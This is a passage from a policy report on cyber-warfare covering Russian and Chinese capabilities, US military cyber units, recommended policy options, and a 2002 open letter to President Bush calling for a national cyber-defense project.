They also believe that the goal for “competing sides” is to gain complete control of the other’s information systems, decision-making processes, and even populace.251 Some Russians have even said that computer viruses can be used as “powerful force multipliers” when in conflict with another entity. All of this shows the dire need for international cooperation in securing the global infrastructure and economy. If Russia successfully took out another country’s critical infrastructure or banking systems, the country would be effectively destroyed, not to mention the effect it would have on the global economy. Therefore, the American government must follow through with the International Cyber-security Collaboration (Sec. 6.9.3) and lead the way in developing strong defense capabilities for the entire world. An international treaty could also be constructed in order to lay out rules of engagement in regard to cyber-warfare.

However, it must be noted that Russia has also enacted laws against any form of cyber-attack and has made its intentions clear that the aggressor will be investigated and prosecuted. Because their government has made these laws, Russian comments about nuclear retaliation can possibly be seen as threats, but they must also be heeded, and international cyber-security must be increased.

249 Hildreth, Steven A. “Cyberwarfare.” CRS Report for Congress. June 19, 2000. <http://www.fas.org/irp/crs/RL30735.pdf>.

250 Ibid.

251 Lester W. Grau and Timothy L. Thomas. “A Russian View of Future War: Theory and Direction,” The Journal of Slavic Military Studies. Issue 9.3 (Sept. 1996), pp. 501-518.

6.9.4.4 People’s Republic of China

China is another country that demonstrates the need for international collaboration in defending our cyberspace. Over the past decade, its military has aggressively developed cyber-warfare technologies and has incorporated these technologies into its military organization, doctrine, and training. The large push towards information warfare stems from the country’s indigenous modern and ancient concepts of how to conduct war, the People’s War concept and the 36 Stratagems, respectively. Their warfare is based around “deception, knowledge-style war, and seeking asymmetrical advantages over an adversary.”252 Because of the Chinese theories on gaining lop-sided advantages, the international need for cyber-defense is even more apparent. If China were to attack a weaker country with limited cyber-security, it would potentially be able to take over every aspect of their infrastructure, similar to Russia’s attack on Estonia.

The Chinese have also been pursuing the idea of a Net Force that would consist of thousands of computer professionals who have all been trained at various universities and training facilities. It has also been reported that several large-scale cyber-training seminars have been held since 1997.253 Due to China’s obvious efforts to gain military dominance through cyber-warfare, the United States military should begin to contract its own computer experts in order to develop the technologies needed to protect both our allies and ourselves against any attacks, no matter the source.

6.10 Military Policy

As the global balance of power continues to shift, it is crucial that the United States military stay ahead of foreign powers, especially in the area of cyber dominance. Although cyber dominance includes electronic warfare, this policy analysis will be limited primarily to cyber-warfare.

6.10.1 Current Military Cyber Units

Although cyber threats have existed for most of a decade, the military has been slow to respond in the form of specific military units designated to respond to the growing arena of cyber-warfare. Initially cyber-warfare was lumped under Space Command, but as of 2007 the 8th Air Force was designated Cyber Command, an independent command charged with compiling the resources and personnel required for the new theatre of war. The new mission of the Air Force, as stated by Secretary of the Air Force Michael W. Wynne, is to “fly and fight in air, space, and cyberspace.”254

252 Hildreth, Steven A. “Cyberwarfare.” CRS Report for Congress. June 19, 2000. <http://www.fas.org/irp/crs/RL30735.pdf>.

253 Ibid.

254 Wilson, Clay (2007). “CRS Report for Congress: Information Operations, Electronic Warfare, and Cyberwar: Capabilities and Related Policy Issues.” 30 October, 2007. <http://stinet.dtic.mil/cgi-bin/GetTRDoc?AD=ADA466599&Location=U2&doc=GetTRDoc.pdf?>

Before delving into policy recommendations for the military, it is important to briefly describe the current divisions of cyber-warfare in existence. Cyber-warfare is grouped under the large umbrella of Information Operations (IO), which is any action designed to disrupt enemy information systems while protecting one’s own systems. Sub-groups include Psychological Operations, Military Deception, Operational Security, Computer Network Operations, and Electronic Warfare. While all of these groups deal with the electromagnetic spectrum, Computer Network Operations (CNO) is the group specifically tasked with cyber-warfare.255

Under CNO are three main components: Computer Network Defense (CND), Computer Network Exploitation (CNE), and Computer Network Attack (CNA). CND’s mission is to defend network systems against disruption, intrusion, or destruction. Additionally, they monitor aggressive activity and intrusions, which they attempt to prevent through passive measures such as firewalls or more aggressive actions such as determining enemy capability before they can attack the military system. CNE is an emerging section that tries to penetrate enemy systems to determine vulnerabilities in order to plan strategy against various enemy targets. Lastly is CNA, which uses digital signals to enter and control or destroy enemy computer systems.

6.10.2 Military Uses of Cyber-warfare

To date, there are no known cyber-attacks perpetrated by the US military. However, the military has debated using cyber-warfare in the most recent military actions – Kosovo and Operation Iraqi Freedom. In both cases the military had defined plans for attack, but was worried about potential side effects of the attack as well as rights violations under the Geneva accords, specifically the restriction against targeting civilian populations. There was concern, especially in Iraq, that using cyber-attacks could cause cascading failures that would destroy the economic systems of the country and hurt the population. Iraq’s banking system was connected to Europe, while internal military and civilian systems were closely integrated. US officials ultimately decided against cyber-attacks because of the inability to target only the Iraqi military without hurting both Iraqi civilians and Europeans.256 Although there is no evidence of cyber-attacks in Kosovo, there appeared to be a cyber tactic used against Serbian air defense systems, although exactly what the attack was is still uncertain.257

6.10.3 Future of Cyber-warfare in the Military

As both civilian populations and foreign militaries become increasingly reliant upon technology, the military will play an increasing role in national defense and begin to integrate offensive operations into global strategy. To that end, the military should undertake or further develop four areas: create national defense strategies against foreign nations, continue to expand cyber units and cyber education, involve the private sector in development and research, and continue to develop offensive capabilities using cyber-warfare.

255 Ibid.

256 Ibid.

257 “Cyber-war!” PBS: Frontline. April 2003. 29 Oct. 2007. <http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/interviews/arquilla.html>

Since the end of the nineteenth century our nation has developed military strategies for various nations in case of the outbreak of war. As we move into the cyber-age, we must integrate cyber-attacks into the national strategy, but also be wary of foreign cyber-attacks. Just as every country requires different physical military responses, various nations will require more sophisticated strategies that will need to avoid the cascading damages that could result from a poorly managed attack. Although China appears to be our greatest adversary, the military cannot be short-sighted and fail to examine the capabilities of other nations as well as terrorist groups.

As the role of cyber-warfare grows in national planning, the military needs to grow in personnel. As previously mentioned, this year saw the formation of a Cyber Command, as well as the introduction of new job codes specifically for cyber units in the Air Force.258 These job codes create a specific cyber job title, with the airmen working on cyber activities for the entirety of their career. This will not only provide a dedicated job force, but also increase the education and ability in the command.

Additionally, the military has increased efforts in cyber education. The Air Force offers a ten-week cyber boot camp for officer candidates as well as civilian university students that focuses on both the means of cyber-attacks and the legal and political issues regarding cyber-warfare. The Department of Homeland Security and National Science Fund are sponsoring two-year scholarships for students in cyber-warfare on the condition that recipients must then work with a government agency for two years following graduation. Due to the cyber boot camp, Syracuse University has begun to offer courses in cyber defense in local high schools. Over 148 high schools in the northeast have cyber classes that offer college credits if successfully completed.259 Since 2000, small groups of cadets at West Point, the Naval Academy, and the Air Force Academy have built small networks that were then tested and broken by NSA hackers.260 While these steps are beneficial, education must be further expanded in the coming years.

Although the military has made great strides in recent years in identifying the threat of cyber-warfare, it is still in the beginning stages of offensive cyber capabilities. Cyber-attacks were not used in previous engagements in part because of the uncertainty of the potential effects of their attacks. Rather than developing cyber capabilities similar to a cluster bomb, the military needs precision offensive capabilities to attack specific targets with low risk of civilian damages. A clear contrast can be made in regard to the first Gulf War. During the course of our bombing campaign, the US military targeted both water treatment plants and key electrical infrastructure as part of the strategy to force Iraq out of Kuwait. Following the war, the lack of a functioning sanitation system led to 110,000 civilian deaths compared to 3,500 deaths during the course of the war. With the right technology, the US military could instead have disrupted or disabled the plants electronically to achieve the same military objectives. The cyber damage, however, could have been such that simple repairs would restore the systems and prevent the mass loss of life.

258 Shane, Leo III (2007). “AF Taking Careers into Cyberspace.” 30 October, 2007. <http://www.military.com/features/0,15240,152400,00.html?wh=benefits>

259 Wilson, Clay (2007). “CRS Report for Congress: Information Operations, Electronic Warfare, and Cyberwar: Capabilities and Related Policy Issues.” 30 October, 2007. <http://stinet.dtic.mil/cgi-bin/GetTRDoc?AD=ADA466599&Location=U2&doc=GetTRDoc.pdf?>

260 Krebs, Brian (2003). “Cyber War Games Tests Future Troops.” Washington Post, October 30, 2007. <http://www.washingtonpost.com/ac2/wp-dyn/A21871-2003Apr23>

In the endeavor to further develop cyber tools, the military has begun to seek outside help in both development and testing. Earlier in the year both the Air Force and Army solicited assistance from the computer industry in developing offensive capabilities.261 Currently the Pentagon is regularly tested by NSA ‘red teams’ for security holes, a job that could also be given to outside contractors who may take a different tack that would reveal other potential weaknesses. Defensive capabilities are necessary to protect the nation, and it is vital for future military operations to further develop offensive capabilities and integrate cyber-attacks as key tools in combat.

Policy Option 6.10.1: Continue to integrate cyber-warfare into national strategic planning, especially in the areas of growing the military and creating or redefining the mission of the military. This would include increasing the number of units dedicated to cyber-warfare, and expansion throughout the cyber domain.

Policy Option 6.10.2: Increase funding for cyber education, both in the civilian and government sectors. Expanding cyber-warfare training in the military would result in more effective troops, and the civilian sector could offer outside aid and ideas for the military.

Policy Option 6.10.3: Develop specific national strategies for use of cyber-warfare, both offensively and defensively, against nations and terrorist organizations. These policies should focus on the capabilities of foreign powers, as well as specific technologies that could exploit enemy defenses or thwart their offensive capabilities. Any technology discussed in these reports should be fully researched to achieve its maximum effect.

6.10.4 Policy Questions

While the military seeks to improve its defensive capabilities, there are significant policy restrictions that hamper effective cyber operations. In March of this year Marine Gen. James Cartwright, commander of the Strategic Command, told the House Armed Services Committee that the nation needed more than passive defensive measures in regard to cyber-warfare. He commented that although the military was positioned to prevent lower-level hacking, focusing on network defenses amounts to little more than a modern Maginot Line. Instead, Gen. Cartwright asked the Congress to help solve the technical and legal international issues that restrict the cyber capabilities of the military.262

261 Brewin, Bob (2007). “Army, Air Force seek to go on offensive in cyber war.” 30 October, 2007. <http://www.govexec.com/story_page.cfm?filepath=/dailyfed/0607/061307bb1.htm>

262 “Statement of General James E. Cartwright, Commander, United States Strategic Command, before the House Armed Services Committee on United States Strategic Command, 21 March 2007.” 30 October, 2007. <http://armedservices.house.gov/pdfs/FC032107/Cartwright_Testimony032007.pdf>

Essentially, the United States is unable to conduct any cyber actions legally without foreign cooperation. The investigation into the source of cyber-attacks such as Titan Rain is stalled due to Chinese refusal to cooperate with investigations. Through vigilante-type assistance, the government has civilians who work outside of the legal framework to monitor and track foreign hackers, and who even managed to trace the Titan Rain hackers to a specific router in China. However, without international agreements or cooperation, the investigative trail is cut off.263

Additionally, there is the potential for US cyber-activity to create an international incident similar to other intelligence activities. What would the ramifications be if military monitoring or hacking was detected and proven by China or another antagonistic government? A more interesting question is what the response would be from an allied nation if we were monitoring them as well. Also, where is the line before a cyber activity violates the Law of Armed Conflict against another nation? Other questions include the appropriate response to an internal, civilian attack, as well as the possibility of using a neutral party to route cyber activity.264

Although there is not a clear answer to these questions, they are policy issues that should be discussed both in Congress and abroad as an international community. As new weapons come onto the scene, international cooperation has determined the effectiveness and appropriateness of these weapons, and banned cruel and inhumane weapons. Unfortunately, it usually requires a war or widespread use of a technology before policy is adopted – but can we afford to allow a debilitating cyber-attack before we determine international standards for action?

Policy Option 6.10.4: Establish an international convention regarding cyber-warfare, possibly through the United Nations. Work to establish a legal framework for the tracking and use of cyber-attacks, as well as classifications of cyber-attacks. From these classifications (military, terrorist, criminal, etc.) establish protocol for international sanction (if necessary) and rules of engagement or retribution.

Cyber-warfare is the next battlefield, one that the military has acknowledged and is starting to include in both defensive and aggressive planning. The military must further both offensive and defensive operations, as well as develop a culture in the military that acknowledges the use and effectiveness of cyber-attacks, as well as their potential for widespread destruction. Increased education programs and cooperation with the public sector will bring the best and the brightest to turn a potential weakness into another area of US dominance.

263 Thornburgh, Nathan (2005). “The Invasion of the Chinese Cyberspies (And the Man Who Tried to Stop Them).” Time. 30 October, 2007. <http://www.time.com/time/magazine/article/0,9171,1098961-1,00.html>

264 Wilson, Clay (2007). “CRS Report for Congress: Information Operations, Electronic Warfare, and Cyberwar: Capabilities and Related Policy Issues.” 30 October, 2007. <http://stinet.dtic.mil/cgi-bin/GetTRDoc?AD=ADA466599&Location=U2&doc=GetTRDoc.pdf?>

7 Conclusion


7.1 Is Cyber-warfare a threat?

This assessment began with the hypothetical scenario of Chicago being permanently evacuated due to nuclear radiation and the Mississippi River being contaminated and full of sewage. Clearly, this is the worst-case cyber-warfare scenario, not the most realistic. However, the vulnerabilities discussed throughout the paper show that the scenario’s individual components are within the realm of possibility.

As a nation, should we be concerned by cyber-attacks? It is known that cyber-attackers could potentially compromise elements of our critical infrastructure and steal sensitive government data. Foreign nations are preparing for a cyber-war, with the threat of disabling entire military units. On the other hand, the actual effects of many of these cyber-attacks are limited in scope. Data stolen to date has not been classified information, aircraft can be flown without catastrophe even without guidance from air traffic control networks, and many economic and social consequences are short-term in nature. Successful large-scale attacks on the power sector could be extremely costly, but may not be feasible in the near future. But can we dismiss these threats, or should we place them as a high national priority?

Ultimately, the answer is mixed. Our vulnerability to cyber-attacks is clear, especially seeing that the means of attack are so readily accessible. An increasing reliance on computer systems will only expand our vulnerability, especially in areas such as the military that are not yet fully dependent upon networked systems. However, this vulnerability does not translate into the doomsday scenarios that many suggest. At present, a large-scale cyber-attack would almost certainly be part of a larger conventional attack, in which the cyber-attack would simply be used to make an already catastrophic event worse. We are threatened as a nation, but we do not have a crisis on our hands yet, and a future crisis can be prevented by taking wise policy steps now. With better implementation of established cyber-security practices, along with proactive research and development, we can reduce the glaring weaknesses in our cyber-defense and mitigate the vast majority of cyber threats.

7.2 The Way Forward

Action must be taken to counter the current and future threat of cyber-warfare. The federal government should continue to advance the broad policy objectives outlined in the NSSC, and additional measures should be enacted to fill gaps that have become evident in the current policy. We have compiled our suggested “best policies” to fill these gaps.

7.2.1 What Can Be Done Now

Our research has shown that there are no significant barriers to keep the United States Government from implementing the following policies and actions immediately:

Create more severe standards for sentencing convicted cyber-criminals.

Increase federal funding for the US-CERT bulletin and Stay Safe Online, specifically for the marketing initiatives to inform the general public.

Require the IT departments of government agencies to document the structure of their computer systems and their installation of security patches.

Expand cyber-warfare training within the military and at universities to make our Armed Forces more skilled in cyber-warfare tactics.

7.2.2 Policies for the Near Future

The following policies and actions should be given immediate consideration, but will take some time to develop. Our suggested timeline for implementing these suggested policies and actions would be two to five years:

Create a uniform cyber-security licensure and certification process, which could help to ensure the proper level of training for IT professionals.

Create a uniform cyber-security testing procedure for federal agencies and contractors that is able to constantly evolve with new challenges. Creating a federal “red team” of security testers that periodically tests the cyber-security vulnerabilities of government computer systems would help with the evolution of cyber-security.

Enact policies to encourage other nations to prevent cyber-attacks from originating within their borders.

Work with other nations to adopt a set of international cyber-security standards to be followed, to ensure all international computer systems have a minimum level of security. One starting point in a global cyber-security policy could be the creation of a regional North American cyberspace “safe zone”, in which the U.S. would work with Canada and Mexico to ensure the countries work to solve mutual cyber-security issues.

Integrate policies related to cyber-warfare tactics into national strategic planning and any future discussions of redefining the military’s mission.

Create a legally binding set of security requirements for software and hardware. Such a law will need to be abstract enough to accommodate the evolving nature of threats and should balance added security with added costs.

7.2.3 Future Research

The following policies and actions will need extensive research and time before being implemented. A general timeframe for putting the following policies into practice would be approximately ten years.

Establish a widely accepted international treaty or agreement to create a global cyber-security policy, a framework for interagency cooperation and legal response, and an international network of agencies for sharing information.

Establish a cyber-warfare equivalent to the Geneva Convention to establish rules for military use of cyber-warfare tactics.

7.2.4 Conclusion

These “best policies” are a framework based on our research that must be further developed. Special attention should be paid to increasing overall awareness of the issue of cyber-warfare. This would help increase the emphasis placed on cyber-security in both the private and public sectors, including international corporations. Increased awareness could stimulate research and development, spread concerns about cyber-security from IT departments to boardrooms, and help the private sector understand that stronger cyber-security measures are a financially sound undertaking. However, the government must be sure to balance regulation and legal enforcement of the private sector’s cyber-security with the economic costs that would result. One balanced option is to use financial incentives to encourage change.

Although there is never an impenetrable defense, the United States can greatly limit the threat of cyber-warfare over time with more robust cyber-security policies that are able to adapt and evolve to the changing times.


8 Appendix


8.1 Policy Options

Below are the assembled policy options outlined in the report.

Policy Option 6.5.1: Require by law that all computers be secured in specific ways.

A policy that demands all systems be secured is a tempting idea, but carries with it many consequences. Explicitly defining which precautions to take about cyber-security increases government encroachment on individuals and, if worded improperly, could actually make computers less secure. Diversity is an important part of system protection, which a law explicitly demanding specific security precautions might eliminate, actually giving attackers more potential targets. A law requiring security precautions would need to be worded in abstract terms to allow for the diverse systems which currently exist. Specific security measures required by law might raise the cost of computers and reduce the performance of the technology. Defining a bare minimum of precautions that must be taken might lead to fewer systems protecting themselves beyond that minimum. It may be possible to create a law which requires certain precautions with minimal negative side effects and could reduce vulnerability, but such a law would have to be created very carefully.

Policy Option 6.5.2: Change the policies about liability for software makers and/or system administrators.

A policy might be drafted which could hold system administrators responsible for damage caused by their systems. The law would give administrators a larger motivation to secure their systems so that attackers could not commandeer them and execute attacks. In a way, administrators are already responsible for their systems, because security breaches under their watch tend to hurt their careers, so the necessity of this policy is debatable. Changes in liability rules would increase the stress put on those with increased responsibility, possibly raise the cost of their service, and reduce the number of people willing to take the risk of working to protect networks. In some limited systems, changes in liability rules might be more appropriate than in others. For example, administrators responsible for maintaining networks controlling critical infrastructures or connected to extremely high-capacity Internet links might deserve more legal motivation to secure their systems than owners of personal computers.

Applying new responsibility to software developers would slow down the development process and increase the cost. Software prices would rise to offset the legal costs relating to new liabilities, while programmers would be under legal pressure to secure their products, possibly at the expense of performance. The private sector already has motivation to secure its products, but perhaps is not as concerned as it should be that flaws in one system can be used to cause damage to the systems of others. Certain violations of software security might be more appropriate to hold developers responsible for than others; it may be possible to make adjustments in liability rules which improve security with minimal impact on the cost and performance of software. Imported software and outsourced developers would also have to be taken into consideration in any policy about the liability of software developers.

Policy Option 6.5.3: Create programs to approve security products and personnel.

Institutions exist for the licensure of many different professionals and the approval of different products; similar institutions might be created to address cyber-attack possibilities. Policy makers can expect debates over whether government or the private sector can better provide cyber-security approval services. Having a compulsory form of certification may be helpful, since current methods of approving software and personnel for security still allow false products and charlatan professionals to exist. A government approval process for allowing individuals to practice securing systems would have to be carefully crafted by experts to ensure that certified individuals are qualified for their positions. Creating new institutions would be costly, and defining the specific software packages and personnel under their jurisdiction would be difficult, but having more qualified security personnel and higher quality defense products would be helpful.

Policy Option 6.5.4: Federally demand a minimum level of security for critical infrastructure systems.

In 2001, the Energy Information Security program was created in an attempt to develop better defense technologies for our nation's critical infrastructures. Due to the difficulty of and the time needed for installing these technologies, many companies have not kept their systems up to date. Because they are not properly secured, even the "secured" infrastructure companies are left vulnerable to attack simply due to being connected to the same network as the unprotected companies. Therefore, the minimum level of security for our nation's infrastructure must be federally regulated so that the United States' power utilities, water lines, communication systems, and emergency response will not fail due to a "weak link" in their network connections.

Policy Option 6.6.1: Create a more forceful and concentrated effort to prosecute cyber-criminals to the full extent of the damage they caused. It is dangerous to allow criminals who have caused millions of dollars in damage to access computer systems after only a few years of imprisonment. Additionally, minimum and maximum sentences need to be increased to reflect the widespread damages caused by cyber-attacks.

Policy Option 6.6.2: Apply a more concrete method of analyzing cyber-attacks, presented in a way that a general audience can comprehend. This will be useful in enhancing the quality of communication between the government and its citizens.

Policy Option 6.6.3: Allow incentives for the private sector in its own attempts to secure its networks. Because securing their cyber-space yields no direct profit, private companies do not see the benefit in taking the initiative to prevent cyber-attacks on their own systems. If the government were to provide incentives or prominent recognition for companies that successfully work to secure themselves, the private sector would be more likely to conform to the government's view of cyber-security.

Policy Option 6.6.4: Attempt to increase communication not only with home users and small businesses, but also with other nations. A better response to cyber-attacks is dependent on increased communication and analysis of attack trends. Opening up an international dialogue related to cyber-attacks could prepare the US government and citizens for possible future attacks.

Policy Option 6.6.5: Establish a network in which local police and firefighters are able to coordinate effective response systems for local cyber-attacks. For example, provide a hotline that businesses and computer users can access in case of a cyber-attack. The difficulty with this policy is finding a way to communicate if telecommunications were disrupted as well. Perhaps the most reliable method is to create a two-way radio link between departments that heads of Information Technology departments at companies could access as well.

Policy Option 6.7.1: Increase advertisement funding for the federally-managed websites and email lists described above. These websites have the potential to increase public awareness, but are not receiving the traffic needed to make an impact. Advertising them more vigorously would improve their public exposure.

Policy Option 6.7.2: Create greater incentives for small businesses to inform their employees of cyber-security concerns. For example, small businesses could receive tax credits if a certain percentage of their employees subscribe to US-CERT’s e-mail

Policy Option 6.7.3: Provide tax incentives for enterprises whose employees undergo an educational cyber-security course. As in the case of small businesses, this could be an effective way to increase awareness of secure computing practices among individual workers.

Policy Option 6.7.4: Work with private industry to create a standardized set of essential skills for IT professionals in the area of cyber-security, for the purpose of creating a certification program. If such a standard were created, the IT professionals responsible for designing and maintaining companies’ internal computer systems

Policy Option 6.7.5: Accompany existing efforts to encourage electronic submission of shipping manifests with efforts to encourage safe and secure handling of the electronic manifest data. An additional option to consider is an incentive program for companies that implement and document measures taken to secure electronic shipment manifests and shipment tracking systems.

Policy Option 6.7.6: Make available and widely publicize a national database of cyber-incidents and attempted cyber-attacks at critical infrastructure components such as transportation, power, and communication systems. By increasing the public’s attention to these areas, such a database could add pressure on infrastructure companies to focus more on their own cyber-security prevention and response

Policy Option 6.7.7: Increase funding for university-level research of cyber-security and preparedness measures, and provide funding for universities and community colleges to create dedicated cyber-security training and research programs. This could significantly improve the training of America’s future IT workforce.

Policy Option 6.7.8: Create a cyber-warfare threat level indicator system, possibly similar to the Department of Homeland Security’s color-coded daily threat level indicator. This sort of indicator system could be used by media outlets to help publicize the issue of cyber-security, and would increase overall awareness of the issue across all sectors.

Policy Option 6.8.1: Mandate user password complexity and frequent changes, log-outs after a short time of inactivity, and require secondary identification (in the form of ID cards required to run the computer).

Policy Option 6.8.2: IT departments should be required to submit system structure documents, detailing the systems used throughout their agency. Departments should institute a government-wide internet control program to restrict potentially threatening website access. Additionally, they must show prompt response and 100% implementation of security patches for their systems.

Policy Option 6.8.3: Mandate that the future development of the FAA's air traffic control system continue to favor decentralized, redundant regional control centers. This will ensure that it remains impractical for a cyber-attack to disable the air traffic system on a nationwide level. One possibility is to make backup computer systems run in parallel with the main systems, but with a different implementation (e.g. a different hardware configuration or operating system), so a vulnerability exploited on the main system may not affect the backup.

Policy Option 6.8.4: Require that the FAA (or other government agencies) limit outside IT contractors' access to the computer systems they are directly involved with. As discussed previously in Section 3.4.3.2, contractors are currently given full access to systems that are not relevant to their work assignments. This simple measure would limit the risk of an outside contractor inserting malicious code into the agency's computer systems, and remove one vulnerability from the air traffic control system.

Policy Option 6.8.5: Use best-value evaluations when selecting outside contractors. The OMB should establish which IT contractors present the best services, and encourage agencies to select the best contractor and not the lowest bid. Additionally, the OMB could establish a certification system for IT contractors to complete and show minimum proficiency.


Policy Option 6.8.6: Require regular ‘red team’ testing of any agency or private corporation that is connected to the government network. The ‘red team’ should be a multi-agency force that has regular turnover to ensure new ideas are constantly applied in security testing.

Policy Option 6.10.1: Continue to integrate cyber-warfare into national strategic planning, especially in the areas of growing the military and creating or redefining the mission of the military. This would include increasing the number of units dedicated to cyber-warfare, and expansion throughout the cyber domain.

Policy Option 6.10.2: Increase funding for cyber education, both in the civilian and government sectors. Expanding cyber-warfare training in the military would result in more effective troops, and the civilian sector could offer outside aid and ideas for the military.

Policy Option 6.10.3: Develop specific national strategies for use of cyber-warfare, both offensively and defensively, against nations and terrorist organizations. These policies should focus on the capabilities of foreign powers, as well as specific technologies that could exploit enemy defenses or thwart their offensive capabilities. Any technology discussed in these reports should be fully researched to achieve its maximum effect.

Policy Option 6.10.4: Establish an international convention regarding cyber-warfare, possibly through the United Nations. Work to establish a legal framework for the tracking and use of cyber-attacks, as well as classifications of cyber-attacks. From these classifications (military, terrorist, criminal, etc.), establish a protocol for international sanction (if necessary) and rules of engagement or retribution.


8.2 Open Letter to the President

27 February 2002

George W. Bush

President of the United States

The White House

1600 Pennsylvania Avenue, NW

Washington, DC 20500

Mr. President,

Our nation is at grave risk of a cyber attack that could devastate the national psyche and economy more broadly than did the September 11th attack. We, as concerned scientists and leaders, seek your help and offer ours. The critical infrastructure of the United States, including electrical power, finance, telecommunications, health care, transportation, water, defense and the Internet, is highly vulnerable to cyber attack. Fast and resolute mitigating action is needed to avoid national disaster. We urge you to act immediately by forming a Cyber-Warfare Defense Project modeled in the style of the Manhattan Project.

Consider the following scenario. A terrorist organization announces one morning that they will shut down the Pacific Northwest electrical power grid for six hours starting at 4:00 PM; they then do so. The same group then announces that they will disable the primary telecommunication trunk circuits between the U.S. East and West Coasts for a half day; they then do so, despite our best efforts to defend against them. Then, they threaten to bring down the air traffic control system supporting New York City, grounding all traffic and diverting inbound traffic; they then do so. Other threats follow, and are successfully executed, demonstrating the adversary's capability to attack our critical infrastructure. Finally, they threaten to cripple e-commerce and credit card service for a week by using several hundred thousand stolen identities in millions of fraudulent transactions. Their list of demands is then posted in the New York Times, threatening further actions if their demands are not met. Imagine the ensuing public panic and chaos. If this scenario were to unfold, Americans everywhere would feel that our national sovereignty had been compromised; we would wonder how, as a nation, we could have let this happen.

Mr. President, what makes this scenario both interesting and alarming is that all of the aforementioned events have already happened, albeit not concurrently nor all by malicious intent. They occurred as isolated events, spread out over time; some during various technical failures, some during simple (government-sponsored) exercises, and some during real-world cyber attacks. All of them, however, could be effected through remote cyber attack by any adversary who so chooses, whether individual or state-sponsored. The resources required are modest -- far less than the cost of one army tank. All that is required is a small group of competent computer scientists, a few inexpensive PCs, and Internet access. Even the smallest nation-states and terrorist organizations can easily muster such capabilities, let alone better-organized groups such as Al Qaeda. Many nations, including Iran and China, for example, have already developed cyber-offense capabilities that threaten our economy and the economies of our allies.

There is no doubt that such a serious national vulnerability is a real and present danger. This has been affirmed by a number of distinguished bodies, including the President's Commission on Critical Infrastructure Protection (1997), the National Academy of Sciences (Computers at Risk, 1990; Trust in Cyberspace, 1999), and the U.S. Defense Science Board on Information Warfare Defense (1996, 2000).

The consequence of successfully exploiting these vulnerabilities would be significant damage to the U.S. economy, degraded public trust with concomitant long-term retardation of economic growth, degradation in quality of life, and a severe erosion of the public's confidence that the government can adequately protect their security. We have seen the amplification effects, on our economy and on public apprehension, from a single event such as the World Trade Center and Pentagon attacks. Aggregate damages resulting from amateur cyber attacks (e.g., 1998 Internet Worm, Melissa Virus, I-LOVE-YOU virus, Code Red Virus and the Nimda virus) are estimated to have been $12 billion for the year 2001 alone. Extrapolating from this, a professionally-executed, coordinated cyber attack on our national critical infrastructure could easily result in a 100-fold amplification -- 10-fold from being professionally-executed and another 10-fold from indirect e-commerce suppression effects. In terms of a dollar value, this could amount to several hundred billion dollars in damage to the U.S. economy. Moreover, some community experts and reports (such as those cited above) estimate a high probability of a serious attack on U.S. critical infrastructure within the next few years.

The goal of our proposed Manhattan-style undertaking would be to create a national-scale cyber-defense policy and capability to prevent, detect, and respond to cyber threats to our critical infrastructure. We mean Manhattan-style in several senses: national priority, inclusion of top scientists, focus, scope, investment, and urgency with which a national capability must be developed. To prevent attacks, we need a coordinated effort to work with our critical-infrastructure providers in defending their most critical information systems. To detect attacks, we need to permeate our critical networks with a broad sensor grid imbued with the capability to detect large-scale attacks by correlating and fusing seemingly unrelated events that are, in fact, part of a coordinated attack. To respond to attacks, we need to devise strategies and tactics to pre-plan effective actions in the face of major cyber-attack scenarios; we need to augment our national infrastructure with mechanisms that support the defined strategies and tactics when attacks are detected and verified. We believe that all this can be done with a close partnership between the public and private sectors while maintaining sensitivity to public concerns about privacy and fairness, consistent with American values and laws. The result should be a resilient critical infrastructure that is resistant to cyber attack, plus next-generation technology which enables our critical infrastructure to be more easily secured. Given private-sector economic realities, our nation's economy and well-being will continue to rely on the existing vulnerable infrastructure for the indefinite future, unless strong government investment leads the way.

The proposed Manhattan-style cyber-defense project will cost a fraction of the expense we will incur from a single major cyber attack. We estimate the project would require an investment of $500 million per year initially, and could reach the billion dollar level in the out-years. The project would run over the course of five years to create a national-scale initial operating capability no later than year three, and more advanced defensive and offensive capabilities by year five. We recommend that you appoint a small board of top computer scientists and engineers to work out the details of a plan, and set the plan in motion within ninety days. The plan should include an appropriate balance between engineering and focused research to support the national capability and the policy, laws, and procedures that would be needed to deploy and support the cyber-defense technology.

The clock is ticking. We look to you, as America's leader, to act on behalf of the nation. Your conscientious and effective defense of our physical homeland should extend into the increasingly vital frontier of U.S. cyberspace. We anticipate that the nation will fully endorse and even expect this forward-thinking and courageous action in the face of such a major threat to national security. We stand ready to help in any way we can in taking this very important next step to defend our country.

Very respectfully,

[signed]

O. Sami Saydjari, Founder, Cyber Defense Research Center; Former Information Assurance Program Manager, DARPA; Former Fellow, National Security Agency
Dr. Robert Balzer, Chief Technology Officer, Teknowledge Corporation
Terry C. Vickers Benzel, Vice President of Advanced Security Research, Network Associates, Inc.
Thomas A. Berson, Ph.D., Principal Scientist, Palo Alto Research Center; Past-President, International Association for Cryptologic Research; Past-Chair, IEEE Technical Committee on Security and Privacy
Bob Blakely, Chief Scientist, Security and Privacy
Salvatore J. Stolfo, Professor of Computer Science, Columbia University
Dr. Curtis R. Carlson, Chief Executive Officer, SRI International
George Cybenko, Dorothy and Walter Gramm Professor, Thayer School of Engineering, Dartmouth College
John C. Davis, Director of Information Security, Mitretek Systems Inc.; Former Commissioner on PCCIP; Former Director of NCSC/NSA
Matt Donlon, Former Director, Security and Intelligence Office, Defense Advanced Research Projects Agency
Patrick Lincoln, Member of Defense Science Board Panels, 2000-2001
Roy A. Maxion, Ph.D., Director, Dependable Systems Laboratory, Computer Science Department, Carnegie Mellon University
David J. Farber, Moore Professor of Telecommunications and Professor of Business and Public Policy, University of Pennsylvania
Richard J. Feiertag, Manager of Strategic Planning, NAI Labs, Security Research Division, Network Associates, Inc.
Edward A. Feigenbaum, Kumagai Professor of Computer Science Emeritus, Stanford University, and Chief Scientist, United States Air Force (1994-97)
Dr. Tiffany M. Frazier, Director, Advanced Computing, IBM Tivoli Software
Seymour E. Goodman, Professor of International Affairs and Computing; Co-Director, Georgia Tech Information Security Center, Georgia Institute of Technology
Dr. J. Thomas Haigh, Chief Technology Officer, Secure Computing Corporation
Walter L. Heimerdinger, PhD
Patrick M. Hughes, Lieutenant General, U.S. Army, Retired; President, PMH Enterprises LLC; Former Director, Defense Intelligence Agency; Former Director of Intelligence (J-2), Joint Chiefs of Staff
Stephen T. Kent, Chief Scientist -- Information Security, BBN Technologies -- A Verizon Company (member of "Computers at Risk" & "Trust in Cyber Space" NRC committees)
Angelos D. Keromytis, Assistant Professor, Computer Science Dept., Columbia University
